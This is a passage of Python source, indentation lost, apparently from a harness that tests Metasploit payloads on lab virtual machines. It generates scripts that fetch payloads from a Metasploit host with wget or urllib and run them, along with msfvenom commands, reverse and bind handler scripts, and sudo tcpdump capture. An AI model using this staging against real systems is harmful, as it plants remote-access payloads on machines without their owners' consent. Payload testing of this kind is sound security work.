rcScriptContent = rcScriptContent + "echo '<ruby>' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo ' while framework.sessions.count == 0 do '>> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo ' sleep(1)' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo ' end' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo ' sleep(30)' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo '</ruby>' >> " + rcScriptName + '\n'
else:
rcScriptContent = rcScriptContent + "echo 'show options' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + rubySleep
rcScriptContent = rcScriptContent + "echo 'run -z' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo '<ruby>' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo ' sleep(10)' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo '</ruby>' >> " + rcScriptName + '\n'
addSleep = True
for cmd in cmdList:
processedCmd = replaceWildcards(cmd, targetData, sessionData, portNum)
rcScriptContent = rcScriptContent + "echo '" + processedCmd + "' >> " + rcScriptName + '\n'
if "<ruby>" in processedCmd.lower():
addSleep = False
if "</ruby>" in processedCmd.lower():
addSleep = True
if addSleep:
rcScriptContent = rcScriptContent + rubySleep
rcScriptContent = rcScriptContent + "echo 'exit -y' >> " + rcScriptName + '\n'
return rcScriptContent
def makeStageTwoPyScript(targetData, httpPort, remoteLogFile, terminationToken):
stageTwoPyContent = "# AUTOGENERATED TEST SCRIPT \n"
stageTwoPyContent = stageTwoPyContent + "import subprocess\n"
stageTwoPyContent = stageTwoPyContent + "import time\n"
stageTwoPyContent = stageTwoPyContent + "import urllib\n"
stageTwoPyContent = stageTwoPyContent + "\n"
stageTwoPyContent = stageTwoPyContent + "def logError(logFile, logMessage):\n"
stageTwoPyContent = stageTwoPyContent + " try:\n"
stageTwoPyContent = stageTwoPyContent + " fileObj = open(logFile, 'a')\n"
stageTwoPyContent = stageTwoPyContent + " fileObj.write(logMessage)\n"
stageTwoPyContent = stageTwoPyContent + " fileObj.close()\n"
stageTwoPyContent = stageTwoPyContent + " except Exception as e:\n"
stageTwoPyContent = stageTwoPyContent + " print 'logError Failed: ' + str(e) + '\\n'\n"
stageTwoPyContent = stageTwoPyContent + " return False\n"
stageTwoPyContent = stageTwoPyContent + " return True\n"
stageTwoPyContent = stageTwoPyContent + "\n"
stageTwoPyContent = stageTwoPyContent + "def getPayload(url, localName, logFile):\n"
stageTwoPyContent = stageTwoPyContent + " downloadSuccess = False\n"
stageTwoPyContent = stageTwoPyContent + " for i in range(10):\n"
stageTwoPyContent = stageTwoPyContent + " logError(logFile, 'DOWNLOADING ' + url + '\\n')\n"
stageTwoPyContent = stageTwoPyContent + " try:\n"
stageTwoPyContent = stageTwoPyContent + " urllib.urlretrieve(url, localName)\n"
stageTwoPyContent = stageTwoPyContent + " except Exception as e:\n"
stageTwoPyContent = stageTwoPyContent + " logError(logFile, 'FAILED TO GET ' + url + ':\\n' + str(e) + '\\n')\n"
stageTwoPyContent = stageTwoPyContent + " time.sleep(5)\n"
stageTwoPyContent = stageTwoPyContent + " continue\n"
stageTwoPyContent = stageTwoPyContent + " logError(logFile, 'DOWNLOADED ' + url + '\\n')\n"
stageTwoPyContent = stageTwoPyContent + " break\n"
stageTwoPyContent = stageTwoPyContent + " return True\n"
stageTwoPyContent = stageTwoPyContent + "\n"
stageTwoPyContent = stageTwoPyContent + "def runCommand(cmdList, getOutput, logFile):\n"
stageTwoPyContent = stageTwoPyContent + " logError(logFile, 'LAUNCHING ' + ' '.join(cmdList) + '\\n')\n"
stageTwoPyContent = stageTwoPyContent + " try:\n"
stageTwoPyContent = stageTwoPyContent + " payloadProcess = subprocess.Popen(cmdList, stdout = subprocess.PIPE, stderr = subprocess.PIPE)\n"
stageTwoPyContent = stageTwoPyContent + " except Exception as e:\n"
stageTwoPyContent = stageTwoPyContent + " logError(logFile, 'FAILED TO RUN ' + ' '.join(cmdList) + ':\\n' + str(e) +'\\n')\n"
stageTwoPyContent = stageTwoPyContent + " return False\n"
stageTwoPyContent = stageTwoPyContent + " logError(logFile, 'LAUNCHED ' + ' '.join(cmdList) + '\\n')\n"
stageTwoPyContent = stageTwoPyContent + " time.sleep(5)\n"
stageTwoPyContent = stageTwoPyContent + " if getOutput:\n"
stageTwoPyContent = stageTwoPyContent + " return payloadProcess.communicate()\n"
stageTwoPyContent = stageTwoPyContent + " return True\n"
stageTwoPyContent = stageTwoPyContent + "logError(r'" + remoteLogFile + "', 'TESTING\\n')\n"
stageTwoPyContent = stageTwoPyContent + "\n"
for sessionData in targetData['SESSION_DATASETS']:
if 'PAYLOAD' in sessionData and sessionData['MODULE']['NAME'].lower() == "exploit/multi/handler":
msfIpAddress = sessionData['MSF_HOST']['IP_ADDRESS']
payloadFile = sessionData['PAYLOAD']['FILENAME']
stageTwoPyContent = stageTwoPyContent + "url = 'http://" + msfIpAddress + ":" + str(httpPort) + "/" + payloadFile + "'\n"
stageTwoPyContent = stageTwoPyContent + "fileName = r'" + targetData['PAYLOAD_DIRECTORY'] + '\\' + payloadFile + "'\n"
if '.py' in payloadFile:
stageTwoPyContent = stageTwoPyContent + "cmdList = [r'" + targetData['METERPRETER_PYTHON'] +"', fileName]\n"
elif 'jar' in payloadFile:
stageTwoPyContent = stageTwoPyContent + "cmdList = [r'" + targetData['METERPRETER_JAVA'] + "','-jar', fileName]\n"
else:
stageTwoPyContent = stageTwoPyContent + "cmdList = [fileName]\n"
stageTwoPyContent = stageTwoPyContent + "getPayload(url, fileName, r'" + remoteLogFile + "')\n"
stageTwoPyContent = stageTwoPyContent + "runCommand(cmdList, False, r'" + remoteLogFile + "')\n"
stageTwoPyContent = stageTwoPyContent + "time.sleep(5)\n"
stageTwoPyContent = stageTwoPyContent + "cmdList = ['netstat', '-ant']\n"
stageTwoPyContent = stageTwoPyContent + "netstatResults = runCommand(cmdList, True, r'" + remoteLogFile + "')\n"
stageTwoPyContent = stageTwoPyContent + "logError(r'" + remoteLogFile + "', str(netstatResults[0]))\n"
stageTwoPyContent = stageTwoPyContent + "logError(r'" + remoteLogFile + "', str(netstatResults[1]))\n"
stageTwoPyContent = stageTwoPyContent + "logError(r'" + remoteLogFile + "','" + terminationToken + "\\n')\n"
return stageTwoPyContent
def makeStageTwoShScript(targetData, httpPort, remoteLogFile, terminationToken):
stageTwoShContent = "# AUTOGENERATED TEST SCRIPT \n"
stageTwoShContent = stageTwoShContent + "cd " + targetData['PAYLOAD_DIRECTORY'] + " \n"
for sessionData in targetData['SESSION_DATASETS']:
if 'PAYLOAD' in sessionData and sessionData['MODULE']['NAME'].lower() == "exploit/multi/handler":
msfIpAddress = sessionData['MSF_HOST']['IP_ADDRESS']
payloadFile = sessionData['PAYLOAD']['FILENAME']
url = "'http://" + msfIpAddress + ":" + str(httpPort) + "/" + payloadFile + "'\n"
stageTwoShContent = stageTwoShContent + "\nwget " + url + "\n"
stageTwoShContent = stageTwoShContent + "sleep 5 \n"
stageTwoShContent = stageTwoShContent + "chmod 755 " + payloadFile + "\n"
if '.py' in payloadFile:
stageTwoShContent = stageTwoShContent + targetData['METERPRETER_PYTHON'] + " " + payloadFile + "&\n"
elif 'jar' in payloadFile:
stageTwoShContent = stageTwoShContent + targetData['METERPRETER_JAVA'] + " -jar " + payloadFile + "&\n"
else:
stageTwoShContent = stageTwoShContent + "./" + payloadFile + "&\n"
stageTwoShContent = stageTwoShContent + "echo " + terminationToken + " > " + remoteLogFile + "\n"
return stageTwoShContent
def parseHypervisorConfig(hypervisorConfigFile):
try:
fileObj = open(hypervisorConfigFile, 'r')
jsonString = fileObj.read()
fileObj.close()
except IOError as e:
print("FAILED TO FIND HYPERVISOR CONFIG FILE: " + hypervisorConfigFile)
return None
try:
hypervisorData = json.loads(jsonString)
except Exception as e:
print("FAILED TO PARSE HYPERVISOR CONFIG FILE: " + str(e))
return None
return hypervisorData
def parseTestConfig(configFile):
try:
fileObj = open(configFile, 'r')
jsonString = fileObj.read()
fileObj.close
except IOError as e:
print("FAILED TO OPEN: " + configFile + '\n' + str(e))
return None
try:
jsonDic = json.loads(jsonString)
except Exception as e:
print("FAILED TO PARSE DATA FROM: " + configFile + '\n' + str(e))
return None
return jsonDic
def prepConfig(args):
logFile = None
configData = parseTestConfig(args.testfile)
if None == configData:
logMsg(logFile, "THERE WAS A PROBLEM WITH THE TEST JSON CONFIG FILE")
exit(999)
if args.framework != None:
configData['FRAMEWORK_BRANCH'] = args.framework
if args.payload != None:
payloadDic = {}
payloadDic['NAME'] = args.payload
if args.payloadoptions != None:
payloadDic['SETTINGS'] = args.payloadoptions.split(',')
else:
payloadDic['SETTINGS'] = []
if 'PAYLOADS' in configData:
configData['PAYLOADS'].append(payloadDic.copy())
else:
configData['PAYLOADS'] = [payloadDic.copy()]
if (args.module == None) and ('MODULES' not in configData):
args.module = "exploit/multi/handler"
if args.module != None:
moduleDic = {}
moduleDic['NAME'] = args.module
moduleDic['SETTINGS'] = []
if 'MODULES' in configData:
configData['MODULES'].append(moduleDic.copy())
else:
configData['MODULES'] = [moduleDic.copy()]
"""
SET UP DIRECTORY NAMES IN THE CONFIG DICTIONARY
"""
if 'FRAMEWORK_BRANCH' not in configData:
configData['FRAMEWORK_BRANCH'] = 'upstream/master'
configData['REPORT_PREFIX'] = os.path.splitext(os.path.basename(args.testfile))[0]
if args.payload != None:
payloadType = args.payload.split('/')[-1]
configData['REPORT_PREFIX'] = configData['REPORT_PREFIX'] + "-" + payloadType
configData['TIMESTAMP'] = str(time.time()).split('.')[0]
configData['DATA_DIR'] = os.getcwd() + "/" + "test_data"
configData['TEST_DIR'] = configData['DATA_DIR'] + "/" + configData['REPORT_PREFIX'] + "_" + configData['TIMESTAMP']
configData['REPORT_DIR'] = configData['TEST_DIR'] + "/" + "reports"
configData['SESSION_DIR'] = configData['TEST_DIR'] + "/" + "sessions"
configData['SCRIPT_DIR'] = configData['TEST_DIR'] + "/" + "scripts"
if not os.path.exists(configData['DATA_DIR']):
os.makedirs(configData['DATA_DIR'])
if not os.path.exists(configData['TEST_DIR']):
os.makedirs(configData['TEST_DIR'])
if not os.path.exists(configData['REPORT_DIR']):
os.makedirs(configData['REPORT_DIR'])
if not os.path.exists(configData['SESSION_DIR']):
os.makedirs(configData['SESSION_DIR'])
if not os.path.exists(configData['SCRIPT_DIR']):
os.makedirs(configData['SCRIPT_DIR'])
"""
ADD LOGFILE TO THE configData DICTIONARY
"""
configData['LOG_FILE'] = configData['REPORT_DIR'] + "/testlog.log"
if 'TARGET_GLOBALS' in configData:
expandGlobalAttributes(configData)
if 'CREDS_FILE' in configData:
if getCreds(configData) == False:
return None
return configData
def prepStagedScripts(testConfig, portNum):
"""
THIS SECTION MARSHALLS THE DATA WE WILL NEED LATER TO GENERATE THE THREE STAGED SCRIPTS
TO MAKE THE STAGE ONE SCRIPT, CREATE THE MSFVENOM COMMANDS AND RC SCRIPTS, THEN SPLIT
THEM BETWEEN THE MSF_HOSTS
FOR EACH PAYLOAD TO AN UPLOAD TARGET:
PREP STAGE ONE SCRIPT:
(1) GENERATE THE MSFVENOM COMMAND TO EXECUTE ON THE MSF_HOST TO MAKE THE PAYLOAD
(2) ADD THE MSFVENOM COMMAND TO THE STAGE ONE SCRIPT
(3) GENERATE AN RC SCRIPT TO RUN ON THE MSFHOST TO SET UP THE PAYLOAD HANDLER
(4) WRITE THE RC SCRIPT TO DISK LOCALLY
(5) ADD COMMANDS TO THE STAGE ONE SCRIPT TO LAUNCH MSFCONSOLE WITH RC SCRIPTS TO SET UP FOR REVERSE PAYLOAD CALLBACKS
(6) ADD COMMAND TO STAGE ONE SCRIPT TO START HTTP SERVER LOCALLY TO HOST THE PAYLOADS FOR DOWNLOAD
PREP STAGE TWO SCRIPT:
(1) DETERMINE OS OF TARGET TO DETERMINE WHAT KIND OF SCRIPT WE NEED
(2) ADD COMANDS TO THE STAGE TWO SCRIPT SO THE TAGETS DOWNLOAD THE PAYLOAD AND EXECUTE IT
"""
"""
THE FIRST FEW LINES OF THE STAGE ONE SCRIPT PREP THINGS
"""
"""
CREATE STAGE SCRIPTS
STAGE_ONE_SCRIPT:
RUNS ON MSF_HOSTS AND CONTAIN THE MSFVENOM COMMANDS TO
CREATE THE PAYLOADS THAT NEED TO BE UPLOADED TO THE TARGETS,
START AN HTTP SERVER ON THE MSF_HOSTS TO SERVE THE PAYLOADS,
AND LAUNCH THE SPECIFIED EXPLOITS
STAGE_TWO_SCRIPTS:
RUN ON TARGET SYSTEMS AND CONTAIN THE COMMANDS TO DOWNLOAD
THE PAYLOADS FROM THE MSF_HOSTS AND LAUNCH THEM ON THE TARGETS
STAGE_THREE_SCRIPT:
RUN ON THE MSF_HOSTS TO ESTABLISH CONNECTIONS TO THE BIND PAYLOADS
"""
lineComment = '\n#################################################################\n'
for host in testConfig['MSF_HOSTS']:
host['STAGE_ONE_SCRIPT'] = lineComment + "\n # STAGE ONE SCRIPT FOR " + host['NAME'] + lineComment
host['STAGE_THREE_SCRIPT'] = lineComment + "\n # STAGE THREE SCRIPT FOR " + host['NAME'] + lineComment
for host in testConfig['TARGETS']:
host['STAGE_TWO_SCRIPT'] = lineComment + "\n # STAGE TWO SCRIPT FOR " + host['NAME'] + lineComment
fileId=0;
for host in testConfig['MSF_HOSTS']:
host['LISTEN_PORTS'] = []
fileId = fileId + 1
# STAGE ONE SCRIPT STUFF
host['STAGE_ONE_FILENAME'] = testConfig['SCRIPT_DIR'] + '/' + "stageOneScript_" + str(fileId) + ".sh"
host['MSF_PAYLOAD_PATH'] = host['MSF_ARTIFACT_PATH'] + "/test_payloads"
host['RC_PATH'] = host['MSF_ARTIFACT_PATH'] + "/test_rc"
host['COMMIT_FILE'] = host['MSF_ARTIFACT_PATH'] + "/commit_tag_" + testConfig['TIMESTAMP']
host ['SCRIPT_PATH'] = host['MSF_ARTIFACT_PATH'] + "/test_scripts"
host['STAGE_THREE_LOGFILE'] = host['SCRIPT_PATH'] + "/stageThreeLog.txt"
host['PCAP_FILE'] = host['MSF_ARTIFACT_PATH'] + "/logfile.pcap"
stageOneContent = "#!/bin/bash -l \n\n"
stageOneContent = stageOneContent + "cd " + host['MSF_PATH'] + "\n"
stageOneContent = stageOneContent + "git fetch upstream\n"
stageOneContent = stageOneContent + "git reset --hard FETCH_HEAD\n"
stageOneContent = stageOneContent + "git clean -df\n"
stageOneContent = stageOneContent + generateBranchScript(testConfig['FRAMEWORK_BRANCH'], testConfig['LOG_FILE'])
stageOneContent = stageOneContent + "git log | head -n 1 > " + host['COMMIT_FILE'] + "\n"
stageOneContent = stageOneContent + "source ~/.rvm/scripts/rvm\n"
stageOneContent = stageOneContent + "cd " + host['MSF_PATH'] + "\n"
stageOneContent = stageOneContent + "rvm --install $(cat .ruby-version)\n"
stageOneContent = stageOneContent + "gem install bundler\n"
stageOneContent = stageOneContent + "bundle install\n"
stageOneContent = stageOneContent + "mkdir " + host['MSF_PAYLOAD_PATH'] + "\n"
stageOneContent = stageOneContent + "rm -rf " + host['MSF_PAYLOAD_PATH'] + "/*\n"
stageOneContent = stageOneContent + "mkdir " + host['RC_PATH'] + "\n"
stageOneContent = stageOneContent + "rm -rf " + host['RC_PATH'] + "/*\n"
stageOneContent = stageOneContent + "echo '" +host['PASSWORD']+ "' | sudo -S tcpdump -i any -s0 -nn net 192.168.0.0/16 -w " + host['PCAP_FILE'] + " &\n"
host['STAGE_ONE_SCRIPT'] = stageOneContent
host['STAGE_THREE_SCRIPT'] = "#!/bin/bash -l\n\n"
host['STAGE_THREE_SCRIPT'] = host['STAGE_THREE_SCRIPT'] + "cd " + host['MSF_PATH'] + "\n"
host['STAGE_THREE_SCRIPT'] = host['STAGE_THREE_SCRIPT'] + "source ~/.rvm/scripts/rvm\n"
host['STAGE_THREE_SCRIPT'] = host['STAGE_THREE_SCRIPT'] + "cd " + host['MSF_PATH'] + "\n"
host['STAGE_THREE_SCRIPT'] = host['STAGE_THREE_SCRIPT'] + "rvm --install $(cat .ruby-version)\n"
host['STAGE_THREE_SCRIPT'] = host['STAGE_THREE_SCRIPT'] + "gem install bundler\n"
host['STAGE_THREE_SCRIPT'] = host['STAGE_THREE_SCRIPT'] + "bundle install\n"
sessionCounter = 0
for host in testConfig['TARGETS']:
host['LISTEN_PORTS'] = []
logMsg(testConfig['LOG_FILE'], "=============================================================================")
logMsg(testConfig['LOG_FILE'], host['NAME'])
logMsg(testConfig['LOG_FILE'], "=============================================================================")
for sessionData in host['SESSION_DATASETS']:
sessionData['MSF_HOST'] = testConfig['MSF_HOSTS'][sessionCounter % len(testConfig['MSF_HOSTS'])]
sessionCounter = sessionCounter + 1
logMsg(testConfig['LOG_FILE'], "ASSIGNING TO MSF_HOST " + sessionData['MSF_HOST']['NAME'])
stageOneContent = '\n\n##########################\n'
stageOneContent = stageOneContent + '# MODULE: ' + sessionData['MODULE']['NAME'] + '\n'
if 'PAYLOAD' in sessionData:
stageOneContent = stageOneContent + '# PAYLOAD: ' + sessionData['PAYLOAD']['NAME'] + '\n'
sessionData['PAYLOAD']['PRIMARY_PORT'] = portNum.get()
uniqueId = str(sessionData['PAYLOAD']['PRIMARY_PORT'])
if 'reverse' in sessionData['PAYLOAD']['NAME'].lower() \
and sessionData['MODULE']['NAME'].lower() == 'exploit/multi/handler':
sessionData['MSF_HOST']['LISTEN_PORTS'].append(str(sessionData['PAYLOAD']['PRIMARY_PORT']))
else:
uniqueId = getTimestamp()
stageOneContent = stageOneContent + '# TARGET: ' + host['IP_ADDRESS'] + '\n'
stageOneContent = stageOneContent + '# MSF_HOST: ' + sessionData['MSF_HOST']['IP_ADDRESS'] + '\n'
stageOneContent = stageOneContent + '#\n'
if sessionData['MODULE']['NAME'].lower() == 'exploit/multi/handler':
# WE NEED TO ADD THE MSFVENOM COMMAND TO MAKE THE PAYLOAD TO THE STAGE ONE SCRIPT
sessionData['PAYLOAD']['FILENAME'] = '-'.join(sessionData['PAYLOAD']['NAME'].split('/')) + \
'-' + 'x'.join(host['IP_ADDRESS'].split('.')) + \
'-' + uniqueId
sessionData['PAYLOAD']['VENOM_CMD'] = makeVenomCmd(host,
sessionData,
portNum,
testConfig['LOG_FILE'])
# ADD VENOM COMMAND TO THE SCRIPT CONTENT
stageOneContent = stageOneContent + sessionData['PAYLOAD']['VENOM_CMD'] + '\n'
stageOneContent = stageOneContent + 'mv ' + sessionData['PAYLOAD']['FILENAME'] + \
' ' + sessionData['MSF_HOST']['MSF_PAYLOAD_PATH'] + '/' + sessionData['PAYLOAD']['FILENAME'] + '\n'
stageOneContent = stageOneContent + "sleep 20\n"
sessionData['RC_IN_SCRIPT_NAME'] = sessionData['MSF_HOST']['RC_PATH'] + '/' + sessionData['PAYLOAD']['FILENAME'].split('.')[0]+'.rc'
else:
sessionData['RC_IN_SCRIPT_NAME'] = sessionData['MSF_HOST']['RC_PATH'] + '/' + '-'.join(sessionData['MODULE']['NAME'].split('/')) + '_' + \
host['IP_ADDRESS'] + '_' + uniqueId + '.rc'
sessionData['RC_OUT_SCRIPT_NAME'] = sessionData['RC_IN_SCRIPT_NAME'] + '.txt'
rcScriptContent = makeRcScript(testConfig['COMMAND_LIST'],
host,
sessionData,
testConfig['LOG_FILE'],
portNum)
stageOneContent = stageOneContent + rcScriptContent + '\n'
if 'PAYLOAD' in sessionData \
and 'bind' in sessionData['PAYLOAD']['NAME'].lower() \
and sessionData['MODULE']['NAME'].lower() == 'exploit/multi/handler':
launchBind = './msfconsole -qr '+ sessionData['RC_IN_SCRIPT_NAME'] + ' > ' + sessionData['RC_OUT_SCRIPT_NAME'] + '&\n'
logLaunch = "echo 'LAUNCHING " + sessionData['RC_IN_SCRIPT_NAME'] + "' >> " + sessionData['MSF_HOST']['STAGE_THREE_LOGFILE'] + '\n'
sessionData['MSF_HOST']['STAGE_THREE_SCRIPT'] = sessionData['MSF_HOST']['STAGE_THREE_SCRIPT'] + launchBind
sessionData['MSF_HOST']['STAGE_THREE_SCRIPT'] = sessionData['MSF_HOST']['STAGE_THREE_SCRIPT'] + logLaunch
logLaunch = "echo 'SUCCESSFULLY LAUNCHED " + sessionData['RC_IN_SCRIPT_NAME'] + "' >> " + sessionData['MSF_HOST']['STAGE_THREE_LOGFILE'] + '\n'
sessionData['MSF_HOST']['STAGE_THREE_SCRIPT'] = sessionData['MSF_HOST']['STAGE_THREE_SCRIPT'] + logLaunch
sessionData['MSF_HOST']['STAGE_THREE_SCRIPT'] = sessionData['MSF_HOST']['STAGE_THREE_SCRIPT'] + "sleep 10\n"
else:
stageOneContent = stageOneContent + './msfconsole -qr '+ \
sessionData['RC_IN_SCRIPT_NAME'] + ' > ' + sessionData['RC_OUT_SCRIPT_NAME'] + ' &\n'
sessionData['MSF_HOST']['STAGE_ONE_SCRIPT'] = sessionData['MSF_HOST']['STAGE_ONE_SCRIPT'] + stageOneContent
return sessionCounter
def prepTestVms(testConfig):
"""
PREP ALL MSF_HOSTS AND TARGETS
FOR VIRTUAL HOSTS:
1. IF THERE'S a SNAPSHOT TO USE, REVERT TO IT; OTHERWISE, TAKE A TEMP SNAPSHOT
2. POWER-ON
FOR PHYSICAL TARGETS:
1. ASSUME THEY ARE READY (FOR NOW..... I HAVE FUN PLANS FOR LATER)
"""
testVms = []
for host in testConfig['TARGETS'] + testConfig['MSF_HOSTS']:
if host['TYPE'] == "VIRTUAL":
host['TEMP_SNAPSHOT'] = 'PAYLOAD_TESTING_'+testConfig['TIMESTAMP']
if not host['VM_OBJECT'].takeSnapshot(host['TEMP_SNAPSHOT']):
logMsg(testConfig['LOG_FILE'], "FAILED TO CREATE SNAPSHOT ON " + host['NAME'])
if 'TESTING_SNAPSHOT' in host:
logMsg(testConfig['LOG_FILE'], "TRYING TO REVERT " + host['NAME'] + " TO " + host['TESTING_SNAPSHOT'])
host['VM_OBJECT'].revertToSnapshotByName(host['TESTING_SNAPSHOT'])
for host in testConfig['TARGETS'] + testConfig['MSF_HOSTS']:
if host['TYPE'] == 'VIRTUAL':
testVms.append(host['VM_OBJECT'])
host['VM_OBJECT'].getSnapshots()
host['VM_OBJECT'].powerOn(False)
time.sleep(2)
return testVms
def pullMsfLogs(testConfig):
logFile = None
for msfHost in testConfig['MSF_HOSTS']:
msfHost['VM_OBJECT'].runCmdOnGuest(['/usr/bin/killall', 'tcpdump'])
srcFile = msfHost['PCAP_FILE']
dstFile = testConfig['REPORT_DIR'] + "/" + msfHost['NAME'] + ".pcap"
msfHost['LOCAL_PCAP'] = dstFile
msfHost['VM_OBJECT'].getFileFromGuest(srcFile, dstFile)
srcFile = msfHost['COMMIT_FILE']
dstFile = testConfig['REPORT_DIR'] + "/commit_" + '-'.join(msfHost['IP_ADDRESS'].split('.')) + ".txt"
msfHost['VM_OBJECT'].getFileFromGuest(srcFile, dstFile)
try:
fileObj = open(dstFile, 'r')
commitRaw = fileObj.read().strip()
fileObj.close()
except IOError as e:
logMsg(logFile, "FAILED TO OPEN " + dstFile)
logMsg(logFile, "SYSTEM ERROR: \n" + str(e))
else:
try:
msfHost['COMMIT_VERSION'] = commitRaw.split(' ')[1]
logMsg(testConfig['LOG_FILE'], "COMMIT VERSION OF metasploit-framework on " + msfHost['NAME'] + ": " + msfHost['COMMIT_VERSION'])
except:
logMsg(testConfig['LOG_FILE'], "FAILED TO RETRIEVE COMMIT VERSION")
msfHost['COMMIT_VERSION'] = "UNKNOWN"
return None
def pullTargetLogs(testConfig):
for target in testConfig['TARGETS']:
for sessionData in target['SESSION_DATASETS']:
remoteFileName = sessionData['RC_OUT_SCRIPT_NAME']
logMsg(testConfig['LOG_FILE'], "RC_OUT_SCRIPT_NAME = " + str(sessionData['RC_OUT_SCRIPT_NAME']))
logMsg(testConfig['LOG_FILE'], "SESSION_DIR = " + testConfig['SESSION_DIR'])
logMsg(testConfig['LOG_FILE'], "RC_OUT_SCRIPT_NAME = " + str(sessionData['RC_OUT_SCRIPT_NAME'].split('/')[-1]))
localFileName = testConfig['SESSION_DIR'] + '/' + str(sessionData['RC_OUT_SCRIPT_NAME'].split('/')[-1])
sessionData['LOCAL_SESSION_FILE'] = localFileName
logMsg(testConfig['LOG_FILE'], "SAVING " + target['NAME'] + ":" + remoteFileName + " AS " + localFileName)
if not sessionData['MSF_HOST']['VM_OBJECT'].getFileFromGuest(remoteFileName, localFileName):
logMsg(testConfig['LOG_FILE'], "FAILED TO SAVE " + target['NAME'] + ":" + remoteFileName + " AS " + localFileName)
remoteFileName = sessionData['RC_IN_SCRIPT_NAME']
localFileName = testConfig['SESSION_DIR'] + '/' + str(sessionData['RC_IN_SCRIPT_NAME'].split('/')[-1])
if not sessionData['MSF_HOST']['VM_OBJECT'].getFileFromGuest(remoteFileName, localFileName):
logMsg(testConfig['LOG_FILE'], "FAILED TO SAVE " + target['NAME'] + ":" + remoteFileName + " AS " + localFileName)
return None
def replacePortKeywords(testConfig, portNum):
for target in testConfig['TARGETS']:
logMsg(testConfig['LOG_FILE'], "MODULES = " + str(target['MODULES']))
if 'PAYLOADS' in target:
logMsg(testConfig['LOG_FILE'], "PAYLOADS = " + str(target['PAYLOADS']))
for payload in target['PAYLOADS']:
logMsg(testConfig['LOG_FILE'], str(payload))
# REPLACE THE STRING 'UNIQUE_PORT' WITH AN ACTUAL UNIQUE PORT
# for settingItem in payload['SETTINGS']:
# logMsg(testConfig['LOG_FILE'], "SETTING ITEM= " + settingItem + str(id(settingItem)))
# logMsg(testConfig['LOG_FILE'], "SETTING ITEM= " + settingItem + str(id(settingItem)))
for index in range(len(payload['SETTINGS'])):
logMsg(testConfig['LOG_FILE'], "SETTING ITEM= " + payload['SETTINGS'][index] + str(id(payload['SETTINGS'][index])))
if 'UNIQUE_PORT' in payload['SETTINGS'][index]:
originalString = payload['SETTINGS'][index]
payload['SETTINGS'][index] = originalString.replace("UNIQUE_PORT", str(portNum.get()), 1)
logMsg(testConfig['LOG_FILE'], "SETTING ITEM= " + payload['SETTINGS'][index] + str(id(payload['SETTINGS'][index])))
for module in target['MODULES']:
logMsg(testConfig['LOG_FILE'], str(module))
for index in range(len(module['SETTINGS'])):
logMsg(testConfig['LOG_FILE'], "SETTING ITEM= " + module['SETTINGS'][index] + str(id(module['SETTINGS'][index])))
def replaceWildcards(originalString, targetData, sessionData, portNum):
if 'UNIQUE_PORT' in originalString:
originalString = originalString.replace("UNIQUE_PORT", str(portNum.get()), 1)
if 'MSF_IP' in originalString:
originalString = originalString.replace("MSF_IP", sessionData['MSF_HOST']['IP_ADDRESS'], 1)
if 'TARGET_IP' in originalString:
originalString = originalString.replace("TARGET_IP", targetData['IP_ADDRESS'], 1)
if 'TARGET_USERNAME' in originalString:
originalString = originalString.replace("TARGET_USERNAME", targetData['USERNAME'], 1)
if 'TARGET_PASSWORD' in originalString:
originalString = originalString.replace("TARGET_PASSWORD", targetData['PASSWORD'], 1)
return originalString
def resetVms(testConfig):
if testConfig == None or 'LOG_FILE' not in testConfig:
return False
retVal = True
for hostKey in ['MSF_HOSTS', 'TARGETS']:
if hostKey in testConfig:
for host in (testConfig[hostKey]):
if host['TYPE'] == "VIRTUAL":
logMsg(testConfig['LOG_FILE'], "RESETTING VM " + host['NAME'])
if 'TEMP_SNAPSHOT' in host:
logMsg(testConfig['LOG_FILE'], "RESETTING VM " + host['NAME'] + " TO " + str(host['TEMP_SNAPSHOT']))
host['VM_OBJECT'].revertToSnapshotByName(host['TEMP_SNAPSHOT'])
host['VM_OBJECT'].powerOff()
host['VM_OBJECT'].deleteSnapshot(host['TEMP_SNAPSHOT'])
else:
logMsg(testConfig['LOG_FILE'], "NO TEMP SNAPSHOT FOUND FOR " + host['NAME'])
retVal = False
return retVal
def revertVm(vmObject, snapshot = None):
if vmObject is None:
return False
vmObject.getSnapshots()
if snapshot is not None:
"""
JUST RETURN TO THE TESTING SNAPSHOT
"""
return vmObject.revertToSnapshotByName(snapshot)
else:
"""
JUST RESET TO THE TEMP SNAPSHOT
"""
vmObject.snapshotList.sort(reverse=True)
for i in vmObject.snapshotList:
if "PAYLOAD_TESTING-" in i[0].name:
vmObject.server.logMsg("REVERTING " + vmObject.vmName + " TO " + i[0].name)
vmObject.revertToSnapshot(i[0].snapshot)
vmObject.deleteSnapshot(i[0].name)
vmObject.powerOff()
return True
def runTest(testConfig, portNum):
"""
FIGURE OUT HOW MANY PAYLOADS WE HAVE AND HOW MANY MSF_HOSTS WE HAVE
SO WE CAN SPLIT THE WORK AMONG ALL MSF_HOSTS
"""
msfHostCount = len(testConfig['MSF_HOSTS'])
sessionCount = getSessionCount(testConfig)
logMsg(testConfig['LOG_FILE'], "MSF_HOST COUNT = " + str(msfHostCount))
logMsg(testConfig['LOG_FILE'], "SESSION COUNT = " + str(sessionCount))
testVms = instantiateVmsAndServers(testConfig)
# IF WE COULD NOT FIND A VM, ABORT
if None in testVms:
return False
# TAKE SNAPSHOT AND/OR SET THE VMS TO THE DESIRED SNAPSHOT AND POWERS ON
prepTestVms(testConfig)
# WAIT UNTIL ALL VMS HAVE A WORKING TOOLS SERVICE AND AN IP ADDRESS
if not waitForVms(testVms):
return False
"""
MAKE SURE THE TEST CONFIG HAS ANY DHCP ADDRESSES SET PROPERLY AND VERIFY ALL TARGETS?MSF_HOSTS HAVE AN IP
"""
if not setVmIPs(testConfig):
return False
"""
CREATE REQUIRED DIRECTORY FOR PAYLOADS ON VM_TOOLS MANAGED MACHINES
CAN'T DO THIS EARLIER, AS THE MACHINES WERE OFF AND WE NEEDED DHCP-GENERATED IP ADDRESSES
"""
for host in testConfig['TARGETS']:
if "VM_TOOLS_UPLOAD" in host['METHOD'].upper():
